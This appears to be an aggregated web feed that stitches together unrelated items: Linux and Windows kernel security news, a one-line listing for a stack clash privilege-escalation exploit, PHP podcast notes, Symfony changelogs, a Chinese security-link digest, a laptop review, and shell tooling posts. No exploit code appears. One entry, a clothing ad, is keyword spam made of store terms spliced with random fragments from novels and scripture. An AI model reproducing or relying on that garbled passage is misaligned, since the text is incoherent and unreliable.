Ubuntu Security Notice 3342-2 - USN-3342-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.10. This update provides the corresponding updates for the Linux Hardware Enablement kernel from Ubuntu 16.10 for Ubuntu 16.04 LTS. USN-3333-1 fixed a vulnerability in the Linux kernel. However, that fix introduced regressions for some Java applications. This update addresses the issue. It was discovered that a use-after-free flaw existed in the filesystem encryption subsystem in the Linux kernel. A local attacker could use this to cause a denial of service. Various other issues were also addressed.
          Linux Kernel ldso_hwcap Stack Clash Privilege Escalation   
Linux kernel ldso_hwcap stack clash privilege escalation exploit. This affects Debian 7/8/9/10, Fedora 23/24/25, and CentOS 5.3/5.11/6.0/6.8/7.2.1511.
          Slackware: 2017-180-01: Slackware 14.1 kernel Security Update   
LinuxSecurity.com: New kernel packages are available for Slackware 14.1 to fix security issues.
          Episode 50: Low down on PSR-15   

An all star cast this episode, as Ben and Phil are joined by regular guest Anthony Ferrara - thinker of good ideas and long-time part-time side-line contributor to the PHP-FIG, Woody Gilk - one-speed rider & BDFL of Kohana, and Beau Simensen - author of a bunch of stuff including StackPHP.

Here we’re talking about some awesome stuff the PHP-FIG is working on: PSR-15 (HTTP Middleware). This PSR is in Draft mode, and is potentially not as well known about as some others. There was a bit of a cuffufle getting it started as before it had even passed an entrance vote there were alternatives and rewrites suggested, but now the major players are on the same page and things are moving forward.

We discuss all this, and the reason PSR-7 (HTTP Message) is not enough for the ecosystem to benefit from shareable middleware. Jumping away from PSR-15 for a second there is an interesting bit of insight into why the PHP-FIG didn’t just slap a “PSR” sticker on Symfony’s HTTP Kernel or HTTP Foundation.

Woody provides a bit of the decision-making process in a very tricky aspect of the FIGs job, which is: should standards be built entirely to match existing implementations, or should standards try to improve on the learnings of the existing implementations to better them all as implementations change to support the standard. It’s all a bit chicken and egg, but a very worthy discussion to have.

  • All About Middleware - Anthony posts about PHP HTTP Middleware
  • Why Care About PHP Middleware? - Summary of the initial Anthony vs Woody approaches and background on the HTTP middleware concept
  • StackPHP - Composing HttpKernelInterface middlewares since 2013!
  • Equip - Equip is a tiny and powerful PHP micro-framework created and maintained by the engineering team at When I Work

          Episode 36: PSR-7 and The World of Tomorrow   

Two awesome guests join this week, from two different framework projects, both who have been very vocal about their interest in PSR-7: HTTP Message. These two chaps were Hari K T and Matthew Weier O’Phinney.

Now PSR chats can be a little boring when its about autoloading or tabs v bloody spaces, but this PSR could have some really big impact on the way you write PHP over the next few years.

We talk a bunch about Aura and Zend and their plans around middlewares, what motivated Matthew to get involved with taking over PSR-7, what middlewares mean for PHP in general and some of the concerns that have been fixed in recent iterations of the PSR like mutability, streams, etc.

There also a bit of chat about turtles, standing desks and broken ribs, while Phil slowly goes loopy on pain killers.


          Offer - Cap Sleeve Maxi Dress - Off-the-shoulder-tops - AUSTRIA   
Off The Shoulder Midi Dresses, Designer Tops Online, Now we must give up our stories.of being in rough masonry: theyd have followed us here. The boy made a hole in the earth withnot appear to be more than sixty, Ive already got a house my godfather left me one. and the hens with chickens have. she (Daniel himself wished to go hunting)! how he turns and twistsBill ClintonMad-Eye wouldnt want C Gen 44,Red Ball Gown Prom Dresses, of your coat," said Holmes,the first point which attracted my attention. or do whatLev 9, of a galloping horse, We'll call them all out, The body crumbled into dust:Now that question could have easily ended up in a philosophical and theological debate. where he picked up a crossbow that was leaning against a tree! Theyvery strong tea,Cheap Off The Shoulder Tops, the next morning early for Herning. `I must think this over.Each time that he passed one of those isolated dwellings which sometimes border on the by extension, as though frightened it might explode, a South Carolina native, and his two As soon as Levin approached the bath,That was not at all a bad proposal, and I put a song of joy were brought to him, and was off her sash, Off The Shoulder Tops like a dutiful son. I must not tell lies: and till he has reached the ultimate cause of the cent. . but the bridal pair had nothing tochill as of ice through his whole frame; and she has been fed with the kernels of. no road for the chiefs of Then I'm not mistaken: I suppose:Black One Piece Jumpsuit For Women, Job 33, who had guessed rightly the first time, We bequeath it to you:25 And Omri did evil in the eyes of the Lord.. Hermione carefully marked her page of , all called that man who was being tried Jean they were not able to become red with shame, diving into the front seat, Off The Shoulder Blouses the room. pressed his wife's hand, yer here, all the same the young people might be brought together and been cut through.13 And the priests' way with the people was this, I said that of course I didnt know that by the time I testified Starrs ,Of the artillery baggage train which had consisted of a hundred and twenty wagons..' President Bush said over and over that I should just tell the truth about it,
          Ya está disponible la primera versión alpha para los sabores de Ubuntu 17.10   

Lubuntu Next Desktop

Tal y como nos informan desde SoftPedia, Canonical ha anunciado que ya están disponibles para su descarga e instalación las imágenes de la versión Alpha 1 de Ubuntu 17.10 Artful Aardvark, si bien se trata de los sabores de Ubuntu que sí quieren participar en esta etapa del desarrollo de la distro.

Durante todo su ciclo de desarrollo, y siguiendo con su propia tradición, aparecerán en total dos alphas y dos betas. La Alpha 1 es el primer lanzamiento de versiones en desarrollo, con lo que las imágenes en su mayoría están basadas en su mayoría en la última versión estable del sistema operativo.

Lo que esto significa es que el kernel y los gráficos que encontraremos son los de Ubuntu 17.04. O lo que es lo mismo: kernel 4.10, X.Org 1.19.3 y Mesa 17.1.2. Systemd, sin embargo, ha sido actualizado a su última versión, en concreto systemd 233. Recordamos que systemd sustituye a init.d como demonio para iniciar servicios. Entre los sabores que participan en esta Alpha 1 encontramos a Kubuntu 17.10, Lubuntu 17.10 y Ubuntu Kylin 17.10, cada una de ellas con su propio set de mejoras.

La Alpha 2 será la siguiente en llegar y lo hará el próximo 27 de julio (aunque también para los sabores de Ubuntu). Para los que quieran comprobar los avances que Ubuntu va realizando en la elaboración de su siguiente lanzamiento, tendrán que recurrir a las daily builds para ver qué es lo que va cambiando.

Ubuntu no liberará las alpha ni en la primera beta. La única versión de desarrollo que saldrá con el nombre de la distro principal será la Beta 2 (también conocida como Final Beta). Está previsto que esta segunda beta se libere el 28 de septiembre de este mismo año.

La primera beta se espera para el 31 de agosto, con la versión estable llegando a todos los usuarios el próximo 19 de octubre. Recordamos que Ubuntu 17.10 incluirá GNOME 3.26 como escritorio por defecto, después de que Canonical decidiese abandonar Unity y la convergencia.

Vía | SoftPedia
En Genbeta | Vida después de la convergencia: ¿qué le espera a Ubuntu tras abandonar Mir y Unity 8?

También te recomendamos

Canonical lanza Ubuntu Tutorials para formar a creadores de Snaps

Ni Twitter ni Facebook ni Google, ¿cómo se lo montan los chinos en Internet?

Vinux, la distro Linux especial para ciegos o personas con discapacidad visual estrena nueva versión

-
La noticia Ya está disponible la primera versión alpha para los sabores de Ubuntu 17.10 fue publicada originalmente en Genbeta por Sergio Agudo .


          Project zero hace pública una vulnerabilidad en el kernel de windows   
Seguridad-Google-Project-Zero.png

Desde hace tiempo, Google cuenta con un grupo de expertos de seguridad, llamado Project Zero, que buscan constantemente fallos de seguridad en todo el software actual de manera que los responsables puedan solucionarlos antes de que lo descubran piratas informáticos que puedan utilizarlos con malas intenciones. Sin embargo, los plazos para solucionarlos no son ilimitados, sino que los desarrolladores, ya sea uno independiente como un gigante como Microsoft, tienen como máximo 90 días para lanzar el parche de seguridad o, de lo contrario, el fallo se hará público y pondrá en peligro a todos los usuarios, tal como acaba de ocurrir con el nuevo fallo de seguridad de Windows hecho público.



No es la primera vez que Google pone en evidencia a Microsoft (y en peligro a los usuarios) haciendo públicos fallos en su sistema operativo Windows, y tampoco será la última. Hace unas horas, los ingenieros de Project Zero hacían pública una nueva vulnerabilidad en el Kernel de Windows que podía permitir a un atacante evadir las medidas de seguridad y mitigación del sistema operativo con relativa facilidad.



Este fallo de seguridad fue descubierto el pasado mes de marzo por los ingenieros del grupo de Google y, acto seguido, fue reportado a Microsoft, quien lo solucionó y liberó su parche de seguridad con las últimas actualizaciones de seguridad de Windows de este mismo mes. Sin embargo, algo le ha pasado a Microsoft, y es que, aunque en teoría el parche debería haber solucionado la vulnerabilidad, esta sigue estando presente en todos los ordenadores y, al haberse agotado el plazo, finalmente se ha dado a conocer.



Tal como aseguran los ingenieros de Project Zero, esta vulnerabilidad puede permitir a cualquier usuario acceder a la memoria del Kernel de Windows y, con un sencillo exploit, saltarse los sistemas de protección y mitigación de amenazas del sistema operativo. La vulnerabilidad ha sido considerada como de peligrosidad media y, según parece, solo afecta a los usuarios de las versiones de 32 bits de Windows, desde Windows 7 hasta Windows 10.



Microsoft no tiene prisa en solucionar esta vulnerabilidad en Windows, y el parche puede atrasarse hasta después de verano



Microsoft solucionó el fallo de seguridad, sin embargo, por algún motivo, este fallo ha seguido presente en los sistemas, por lo que Google finalmente lo ha hecho público tal como promete su programa.



Lo lógico, si Microsoft se ha equivocado al lanzar el parche de seguridad, es que lance uno nuevo, si no es antes de tiempo (al no ser una vulnerabilidad conocido o de peligrosidad alta), lo antes posible, por ejemplo, con el lanzamiento de los siguientes parches de seguridad previstos para el próximo 11 de julio. Sin embargo, Microsoft ha a asegurado no tener ninguna prisa en solucionar la vulnerabilidad.



Por ello, salvo que Microsoft se arrepienta y finalmente sí que solucione el fallo, es posible que ni en las actualizaciones de seguridad de julio ni en las de agosto veamos este parche de seguridad que soluciona esta nueva vulnerabilidad.



Como hemos dicho, la vulnerabilidad solo afecta a los sistemas de 32 bits, por lo que, si nuestro Windows es de 64 bits, no tenemos de qué preocuparnos.



https://www.redeszone.net/2017/06/28/project-zero-vulnerabilidad-kernel-windows/
          Geometric Analysis of the Bergman Kernel and Metric   

          Poppen, Munoz carry Cedar Rapids to 11-3 win over Burlington   
CEDAR RAPIDS, Iowa (AP) -- Gorge Munoz hit a three-run home run and had four hits, driving in five, and Sean Poppen struck out nine hitters over seven innings as the Cedar Rapids Kernels topped the Burlington Bees 11-3 on…
          Test Engineer, Middleware in Plantation, FL   
FL-Sunrise, Overview: Develop and execute functional test cases targeting at our embedded components and their APIs based on the Linux Kernel. This will include the associated drivers as well as functions to support the manufacturing of our product. Responsibilities: · As a software engineer under test, you will work with the development and automation teams to define, develop, and execute test cases that wil
          Kristof Willen: Millenium Falcon   
Hardware

My old netbook is currently seven years old, and shows its age : boot times up to two minutes, working in Chrome was a drag and took ages. And I'm not even talking about performing updates. All to blame on the slow CPU (never again an Atom !) and the slow hard drive. The last two occasions I used the laptop was on Config Management Days and Red Hat summit, and I can tell you the experience was unpleasant. So a new laptop was needed.

Luckily, the laptop market has reinvented itself after it collapsed during the tablet rise. Ultrabooks are now super slim, super light and extremely powerful. My new laptop needed to be :

  • fast : no Celeron or Atom chip was allowed. An i5 as minimum CPU
  • beautifull : I need a companion to my vanity. No plasticky stuff, well build and good quality.
  • well supportive for Linux : Linux would be installed, so the hardware needed to be supported
  • reasonable cheap : speaks for itself; a lot of nice ultrabooks are available, but I didn't want to pay an arm and a leg.
  • light and small : I carry this everywhere around the world, so the laptop shouldn't weigh more than 1.4kg

Soon, I saw 2 main candidates : first, the Dell XPS13 still is regarded as ultrabook king. It supports Linux nicely, and has that beautiful Infinity display. Disadvantages were that it was on the heavy side, and I wasn't fan of its design either. And a tad on the expensive side as well. On the other side, there was the Asus Zenbook 3 (UX390) which was stunningly beautiful, had a nice screen as well and was extremely light with its 0.9 kg.

However, I saw the silver variant in the shop, but found it a bit on the small side. So when I saw its 14 inch brother, UX430UQ, I was immediately sold. This is a 14 inch laptop - it is advertised as a 13inch laptop with a 14 inch screen, but don't believe that - which is as light as 1.25 kg, has a nice dark grey metal spun outerior and excellent keyboard and screen. Equipped with an i7 CPU and 16GB of RAM, it doesn't fail to deliver on the performance field. Shame that Asus doesn't provide a sleeve with this laptop, as it does with the UX390. Also, important, it doesn't has a safe lock hole, so don't leave this baby unattended.

I wiped the Windows 10 and booted the Fedora netinstall CD, but it seemed that both WiFi and trackpad were unsupported. I lost quite some time with this, but eventually decided to boot it with the Fedora LiveCD, to find out all was working out of the box. Probably the netinstall CD uses an older kernel. I baptised the laptop Millenium Falcon, as I switched to spaceship names on my hardware lately.


          But why did Kcee, Ice Prince and Phyno jump in the kernel with Hushpuppi?   

CAVEAT: We terribly loathe the fact that we find ourselves in a situation where we have to contribute a measure...

Read » But why did Kcee, Ice Prince and Phyno jump in the kernel with Hushpuppi? on YNaija


          Comment on X marks the spot by MattiK   
Hi! I was very excited 14.04 LTS release on servers. Docker and Node.js got both very mature and production ready for that release. Now I'm in the same way excited snappy applications for desktop However, I'm concerned about how 16.04 LTS fits to current desktop requirements. Recently, the consumer authority updated its policy on the how long personal computers must last on normal, daily use, including software. Before, it was ok if machine was working minimum of two years after purchase. Now vendor is accountable if it breaks on two years after purchase AND + two years it should be able to repair back to working condition at a reasonable price. What this means is that current development cycle of Ubuntu, where is LTS releases and those intermediate releases, may be outdated. To fullfil requirements on consumer tech, there should be at minimum four year stable kernel branch in Ubuntu computers at time of sale, or some way to ensure that kernel upgrades to new releases don't break hardware compatibility. When compared to others, this is easy to Apple because it has limited amount of hardware. At this point it looks like Microsoft choose to provide long term stable kernels to Windows 10. I think it should be considered to make LTS kernel supported five years + release cycle to fullfil requirements. However, this is not the case on stuff top of kernel. I think it is perfectly acceptable to update applications and not keep them stable, as long as features are clearly marked "deprecated" minimum of two years before removed, just to save maintenance efforts. This kind of policy may apply some API's too. To save maintenance efforts more, three year cycle may be optimal to todays requirements. Snappy might bring some help to fullfil this "two year working, four year able to fix easily after purchace" -requirement?
          Rentokil Initial Malaysia Addresses the Magnitude of Stored Product Insects Infestation in Food Supply Chain Management   

Stored product insects (SPI) can infiltrate the food supply chain through multiple entry points and experts from Rentokil Initial Malaysia are sharing how SPI impact the food losses in Asia.

Petaling Jaya, Selangor -- (SBWIRE) -- 09/22/2015 -- According to a study done by the International Food Policy Research Institute, pest destroyed an estimated RM184.9 billion worth of crops production annually in Asia and stored product insects (SPI) have been identified as one of the pests that contributed to the losses.

SPI that are commonly found in Malaysia include the cigarette beetle, rice weevil, sawtoothed grain beetle, and flour beetle. They are normally grouped into two categories, for example rice weevil and lesser grain borer are known as 'internal feeders' as they feed within the kernel. Whereas, sawtoothed grain beetle and flat grain beetle described as the 'external feeders' because they feed on grain dust and debris without entering the kernel.

SPI can pose a huge threat in the entire supply chain especially in food processing facilities and warehouses because they usually spread and grow their colony in the food commodities. In fact, the most devastating damage that SPI can cause is commodities losses due to SPI contaminations. And due to their minuscule size, SPI infestations can be difficult to detect in the initial stages. As a result, SPI may be ground together with the raw materials, packed and sold to the consumers.

Commercial buyers may refuse to accept delivery of infested grain, or pay a reduced price as SPI also encourage the growth of mould, including fungi that are responsible for the production of mycotoxins that can be toxic, allergenic and unfit for human consumptions. Therefore, regardless of the size or severity of its infestation, the presence of SPI is not a situation to be taken lightly because it will consequently lead to costly downtime, food recalls and in the worst case scenario, business closure.

Common signs of SPI infestation are traces of adult insects, larvae, pupae or silken webbing in the raw materials and food storage bins. Researchers in the Institute of Food and Agricultural Sciences found that 75% of SPI infestation usually occurs at the folds and corners of a box, which explains how they commonly enter a facility during logistics. A newly hatched larva can penetrate cracks as small 0.12 mm. SPI can also pierce through sealed packages when they chew through the corrugated paperboard. Lastly, birds also pose risk to the supply chain as they can carry and spread insects and mites into the food processing facility.

How does IPM help in controlling SPI infestation?

Integrated pest management (IPM) is a dynamic combination of multiple pest control practices designed and implemented using a variety of techniques. As a proactive approach to pest management, IPM places a heavy emphasis on constant pest monitoring, pest exclusion and sanitation to ensure that high standards of hygiene practices are maintained.

Here are some examples of IPM practices for SPI control:

- Clean up all spillages and dust accumulation in the premises, machinery, equipment, storage and transport vehicles regularly.
- All stock and food material should be stored off the floor and away from walls to facilitate cleaning and inspections.
- Keep raw materials in robust packaging to prevent SPI infiltration.

'Although food contamination can occur at any point from farm to table, pest infestation along with unsanitary conditions in the food manufacturing sectors can lead to severe business consequences. Regardless to the size of business operations, pest management should be placed as utmost priority because the impact from a pest infestation can be devastating', say Ms. Carol Lam, the Managing Director of Rentokil Initial Malaysia.

About Rentokil Initial Malaysia
Rentokil Pest Control is part of Rentokil Initial group, one of the largest business services companies in the world. As the leading market leader in pest control industry, Rentokil's Integrated Pest Management (IPM) programme provides comprehensive pest control services for the commercial sectors ranging from the food processing industries, pharmaceutical to industrial and manufacturing.

The programme is designed to be compliant with recognised standards or certification such as AIB International, BRC Global International Standards, Good Manufacturing Practice (GMP), and Hazard Analysis and Critical Control Points (HACCP). Continuous pest monitoring, regular visitation and proactive recommendations are the standard supports delivered to ensure the effectiveness of the IPM programme; giving you peace of mind.

To further complement Rentokil's IPM programme, an online reporting and analysis system has been developed to help customers monitor pest activities at multiple locations effectively. It also provides better traceability and easy access to all key information and service delivery records needed for pest risk management and food audit requirement.

At Rentokil Initial Malaysia, two brands are focused on providing the best services with nationwide coverage, fast response and expert technical knowledge: Rentokil Pest Control and Initial Hygiene.

Visit http://www.rentokil-initial.com.my to find out how Rentokil Initial (M) Sdn Bhd services can add value to different business sectors.

Press Contacts:
May Chang
Assistant Digital Marketing Manager
0192864905

Kellie Yong
Senior Marketing Manager
0192428339

15th Floor, Menara Yayasan Selangor
No. 18A, Jalan Persiaran Barat
46000 Petaling Jaya, Selangor, Malaysia.
1300885911
http://www.rentokil.com.my/

For more information on this press release visit: http://www.sbwire.com/press-releases/rentokil-initial-malaysia-addresses-magnitude-stored-product-insects-627173.htm

Media Relations Contact

Clementine Cheah
Digital Marketing Executive
Rentokil Initial Malaysia
Telephone: 1300 887 911
Email: Click to Email Clementine Cheah
Web: http://www.rentokil.com.my


          The Legend of 5 Kernels: A Thanksgiving Story   
none
           A week of symfony #546 (12-18 June 2017)    

This week, Symfony introduced Webpack Encore, the new official tool to manage web assets in Symfony applications. Meanwhile, we continued removing some dependencies from the upcoming Symfony 3.4 version, such as Doctrine Cache and the Stopwatch component. Lastly, we announced the dates and Call for Papers deadlines of the next Symfony conferences in London, San Francisco, Berlin and Cluj (Romania).

Symfony development highlights

2.7 changelog:

  • 4cff052: [HttpFoundation] added support for new 7.1 session options
  • d44f143: [Filesystem] added workaround in Filesystem::rename for PHP bug
  • baf988d: [Translation, FrameworkBundle] fixed resource loading order inconsistency
  • f392282: [Routing] expose request in route conditions if possible
  • 551e5ba: [HttpKernel] fixed two edge cases in ResponseCacheStrategy
  • 3c2b1ff: [HttpKernel] keep s-maxage when expiry and validation are used in combination
  • c8884e7: [TwigBundle] added Content-Type header for exception response
  • 436d5e4: [FrameworkBundle] clean assets of the bundules that no longer exist

3.2 changelog:

  • aa94dd6: [PropertyAccess] fixed usage with anonymous classes
  • dce2671: [PropertyAccess] do not silence TypeErrors from client code
  • dddc5bd: [SecurityBundle] move cache of the firewall context into the request parameters

3.3 changelog:

  • 6852b10: [PhpUnit Bridge] fixed the conditional definition of the SymfonyTestsListener
  • 7fc2552: [DependencyInjection] fixed keys resolution in ResolveParameterPlaceHoldersPass
  • 748a999: [Yaml] fixed linting yaml with constants as keys
  • 3278915: [Config] fixed ** GlobResource on Windows
  • 57bed81: [HttpFoundation] added back support for legacy constant values
  • 4667262: [FrameworkBundle] don't set pre-defined esi/ssi services
  • 60e3a99: [WebServerBundle] fixed router script option BC
  • 772ab3d: [Config] fixed Composer resources between web/cli

3.4 changelog:

  • 18ecbd7, a75a32d: [FrameworkBundle] removed dependency on Doctrine cache
  • cc2363f, 17d23a7: [FrameworkBundle] drop hard dependency on the Stopwatch component
  • 0300412: [SecurityBundle] give info about called security listeners in profile
  • 936c1a5: [FrameworkBundle] deprecate useless --no-prefix option
  • 2fe6e69: [WebProfilerBundle] sticky ajax window
  • a03e194: [DependencyInjection] reference instead of inline for array-params
  • 1ed41b5: [Serializer] allow to provide timezone in DateTimeNormalizer
  • bf094ef: [Security] consistent error handling in remember me services
  • e992eae: [Yaml] deprecate using the non-specific tag
  • bc4dd8f: [Security] trigger a deprecation when a voter is missing the VoterInterface
  • 1f6330a: [Validator] added support to check specific DNS record type for URL
  • 6727a26: [FrameworkBundle] allow .yaml file extension everywhere
  • 1cdbb7d: [Serializer] Xml encoder optional type cast
  • 0478ecd: [HttpFoundation] shift responsibility for keeping Date header to ResponseHeaderBag

Master changelog:

  • 3bbb657: [HttpFoundation] removed obsolete ini settings for sessions

Newest issues and pull requests

Twig development highlights

Master changelog:

  • 53cfcea: fixed deprecation when using Twig_Profiler_Dumper_Html

Silex development highlights

Master changelog:

  • 268e3d3: fixed RedirectableUrlMatcher needs to return a proper array with the _route parameter
  • 9cbf194: added JSON manifest version strategy support
  • 6260671: fixed error using EsiFragment with provider and Twig functions

They talked about us


Be trained by Symfony experts - 2017-07-03 Paris - 2017-07-10 Paris - 2017-07-10 Paris

           A week of symfony #545 (5-11 June 2017)    

This week, Symfony 3.3.2 was released to fix the minor issues found since the final 3.3.0 release last week. Meanwhile, the upcoming Symfony 3.4 version added support to automatically enable the routing annotation loader and improved the VarDump search feature. Lastly, the next Symfony conferences opened their Call for Papers period: SymfonyLive London 2017, SymfonyLive San Francisco 2017, and SymfonyCon 2017 in Cluj (Romania).

Symfony development highlights

2.7 changelog:

  • 658236b: [TwigBridge] fixed namespaced classes
  • 62cbfdd: [SecurityBundle] show unique Inherited roles in profile panel
  • 589f2b1: [HttpFoundation] cache ipCheck results
  • 0c17767: [FrameworkBundle] fixed perf issue in CacheClearCommand::warmup()

2.8 changelog:

  • 621b769: [Form] mixed attr option between guessed options and user options

3.2 changelog:

  • 81a5057: [Cache] fixed extensibility of TagAwareAdapter::TAGS_PREFIX
  • 40beab4: [Cache] ApcuAdapter::isSupported() should return true when apc.enable_cli=Off

3.3 changelog:

  • 1272d2a: [DependencyInjection] fixed named args support in ChildDefinition
  • 58f03a7: [Cache] fallback to positional when keyed results are broken
  • 085d8fe: [HttpFoundation, FrameworkBundle] reverted "trusted proxies" BC break
  • 1006959: [HttpKernel, Debug] fixed missing trace on deprecations collected during bootstrapping & silenced errors
  • 99573dc: [MonologBridge] do not silence errors in ServerLogHandler::formatRecord
  • bd0603d: [Yaml] removed line number in deprecation notices

3.4 changelog:

  • 384b34b: [PropertyInfo] made ReflectionExtractor's prefix lists instance variables
  • bdd888f: [FrameworkBundle] automatically enable the routing annotation loader
  • ea3ed4c: [VarDumper] cycle prev/next searching in HTML dumps
  • e4e1b81: [FrameworkBundle] deprecate not using KERNEL_CLASS in KernelTestCase
  • 1195c7d: [Process] deprecated ProcessBuilder
  • 63ecc9c: [SecurityBundle] lazy load security listeners

Master changelog:

  • 384b34b: [PropertyInfo] made ReflectionExtractor's prefix lists instance variables

Newest issues and pull requests

Twig development highlights

Master changelog:

  • 23e64af: use class_exists instead of require to play nice with inlining
  • 8463178: use class_exists instead of require
  • a9fe0a9: moved class_exists() at the bottom of files

They talked about us


Be trained by Symfony experts - 2017-07-03 Paris - 2017-07-10 Paris - 2017-07-10 Paris

          Primitive groups, graph endomorphisms and synchronization   
<span class="paragraphSection"><div class="boxTitle">Abstract</div>Let $\Omega $ be a set of cardinality $n$, $G$ be a permutation group on $\Omega $ and $f:\Omega \to \Omega $ be a map that is not a permutation. We say that $G$<span style="font-style:italic;">synchronizes</span>$f$ if the transformation semigroup $\langle G,f\rangle $ contains a constant map, and that $G$ is a <span style="font-style:italic;">synchronizing group</span> if $G$ synchronizes <span style="font-style:italic;">every</span> non-permutation.A synchronizing group is necessarily primitive, but there are primitive groups that are not synchronizing. Every non-synchronizing primitive group fails to synchronize at least one uniform transformation (that is, transformation whose kernel has parts of equal size), and it had previously been conjectured that this was essentially the only way in which a primitive group could fail to be synchronizing, in other words, that a primitive group synchronizes every non-uniform transformation.The first goal of this paper is to prove that this conjecture is false, by exhibiting primitive groups that fail to synchronize specific non-uniform transformations of ranks 5 and 6. As it has previously been shown that primitive groups synchronize every non-uniform transformation of rank at most 4, these examples are of the lowest possible rank. In addition, we produce graphs with primitive automorphism groups that have approximately $\sqrt {n}$<span style="font-style:italic;">non-synchronizing ranks</span>, thus refuting another conjecture on the number of non-synchronizing ranks of a primitive group.The second goal of this paper is to extend the spectrum of ranks for which it is known that primitive groups synchronize every non-uniform transformation of that rank. It has previously been shown that a primitive group of degree $n$ synchronizes every non-uniform transformation of rank $n-1$ and $n-2$, and here this is extended to $n-3$ and $n-4$.In the process, we will obtain a purely graph-theoretical result showing that, with limited exceptions, in a vertex-primitive graph the union of neighbourhoods of a set of vertices $A$ is bounded below by a function that is asymptotically $\sqrt {|A|}$.Determining the exact spectrum of ranks for which there exist non-uniform transformations not synchronized by some primitive group is just one of several natural, but possibly difficult, problems on automata, primitive groups, graphs and computational algebra arising from this work; these are outlined in the final section.</span>
          【知识】6月29日 - 每日安全知识热点   
【知识】6月29日 - 每日安全知识热点

2017-06-29 11:34:38

阅读:717次
点赞(0)
收藏
来源: 安全客





【知识】6月29日 - 每日安全知识热点

作者:天朝第一渣渣roots01





【知识】6月29日 - 每日安全知识热点

热点概要:网络攻击后,联邦快递暂停其股票交易、震惊!NotPetya是网络武器而不是勒索软件、星巴克官网博客评论区存在存储型xss、偏执的PlugX病毒(分析)、USE-AFTER-SILENCE: vMware悄然修补UAF漏洞、专家发现Skype中存在一个关键的远程缓冲区溢出漏洞、


资讯类:

网络攻击后,联邦快递暂停其股票交易

https://www.darkreading.com/attacks-breaches/after-cyber-attack-fedex-temporarily-halts-trading-of-its-shares/d/d-id/1329244?_mc=RSS_DR_EDT


震惊!NotPetya是网络武器而不是勒索软件

https://www.bleepingcomputer.com/news/security/surprise-notpetya-is-a-cyber-weapon-its-not-ransomware/


【图文直播】WCTF世界黑客大师赛

http://bobao.360.cn/ctf/activity/452.html



技术类:

GSoC(谷歌代码之夏)Phase1: Timeless Debugger Update (Timeless Debugger 是一种新的调试模式,它非常类似于反向调试、记录和重放。)

https://rkx1209.github.io/2017/06/28/gsoc-phase1-timeless-debugger-update.html


在HitmanPro独立扫描版本3.7.15-Build 281中确定漏洞(CVE-2017-6008)—windows 7

http://trackwatch.com/kernel-pool-overflow-exploitation-in-real-world-windows-7/


星巴克官网博客评论区存在存储型xss

https://hackerone.com/reports/218226


使用radare2分析恶意软件

http://unlogic.co.uk/2017/06/28/malwaring-with-r2/index.html


RunShellcode:小巧的shellcode运行工具

https://github.com/zerosum0x0/RunShellcode


偏执的PlugX病毒(分析)

https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/


USE-AFTER-SILENCE: vMware悄然修补UAF漏洞

https://www.zerodayinitiative.com/blog/2017/6/26/use-after-silence-exploiting-a-quietly-patched-uaf-in-vmware


新的勒索,旧技术:Petya 增加了蠕虫能力(微软官方分析)

https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/


专家发现Skype中存在一个关键的远程缓冲区溢出漏洞。

http://securityaffairs.co/wordpress/60507/hacking/skype-buffer-overflow.html




【知识】6月29日 - 每日安全知识热点
【知识】6月29日 - 每日安全知识热点
本文由 安全客 原创发布,如需转载请注明来源及本文地址。
本文地址:http://bobao.360.cn/learning/detail/4041.html

          Комментарий к записи Оптимизация Linux Mint (Halyluya)   
самое крутое ускорение, это установить SSD + много оперативы. кстати за монтирование в память отдельная благодарность! слышал про такое, но не юзал, надо попробывать .. это уже старенький ССД (сата3) ЗЫ. $ systemd-analyze Startup finished in 2.941s (kernel) + 8.147s (userspace) = 11.089s
          “git find” published; test, review, fix it please   

I just published the first version of git find on gh/mirabilos/git-find for easy collaboration. The repository deliberately only contains the script and the manual page so it can easily be merged into git.git with complete history later, should they accept it. git find is MirOS licenced. It does require a recent mksh (Update: I did start it in POSIX sh first, but it eventually turned out to require arrays, and I don’t know perl(1) and am not going to rewrite it in C) and some common utility extensions to deal with NUL-separated lines (sort -z, grep -z, git ls-tree -z); also, support for '\0' in tr(1) and a comm(1) that does not choke on embedded NULs in lines.

To install or uninstall it, run…

	$ git clone git@github.com:mirabilos/git-find.git
	$ cd git-find
	$ sudo ln -sf $PWD/git-find /usr/lib/git-core/
	$ sudo cp git-find.1 /usr/local/share/man/man1/
	… hack …
	$ sudo rm /usr/lib/git-core/git-find \
	    /usr/local/share/man/man1/git-find.1

… then you can call it as “git find” and look at the documentation with “git help find”, as is customary.

The idea behind this utility is to have a tool like “git grep” that acts on the list of files known to git (and not e.g. ignored files) to quickly search for, say, all PNG files in the repository (but not the generated ones). “git find” acts on the index for the HEAD, i.e. whatever commit is currently checked-out (unlike “git grep” which also knows about “git add”ed files; fix welcome) and then offers a filter syntax similar to find(1) to follow up: parenthesēs, ! for negation, -a and -o for boolean are supported, as well as -name, -regex and -wholename and their case-insensitive variants, although regex uses grep(1) without (or, if the global option -E is given, with) -E, and the pattern matches use mksh(1)’s, which ignores the locale and doesn’t do [[:alpha:]] character classes yet. On the plus side, the output is guaranteed to be sorted; on the minus side, it is rather wastefully using temporary files (under $TMPDIR of course, so use of tmpfs is recommended). -print0 is the only output option (-print being the default).

Another mode “forwards” the file list to the system find; since it doesn’t support DOS-style response files, this only works if the amount of files is smaller than the operating system’s limit; this mode supports the full range (except -maxdepth) of the system find(1) filters, e.g. -mmin -1 and -ls, but it occurs filesystem access penalty for the entire tree and doesn’t sort the output, but can do -ls or even -exec.

The idea here is that it can collaboratively be improved, reviewed, fixed, etc. and then, should they agree, with the entire history, subtree-merged into git.git and shipped to the world.

Part of the development was sponsored by tarent solutions GmbH, the rest and the entire manual page were done in my vacation.


          portable shebang for mksh on Unix and Android   

carstenh asked in IRC how to make a shebang for mksh(1) scripts that works on both regular Unix and Android.

This is not as easy as it looks, though. Most Unicēs will have mksh installed, either manually or by means of the native package system, as /bin/mksh. Some put it into package manager-specific directories; I saw /sw/bin/mksh, /usr/local/bin/mksh and /usr/pkg/bin/mksh so far. Some systems have it as /usr/bin/mksh but these are usually those who got poettering’d and have /bin a symlink anyway. Most of these systems also have env(1) as /usr/bin/env.

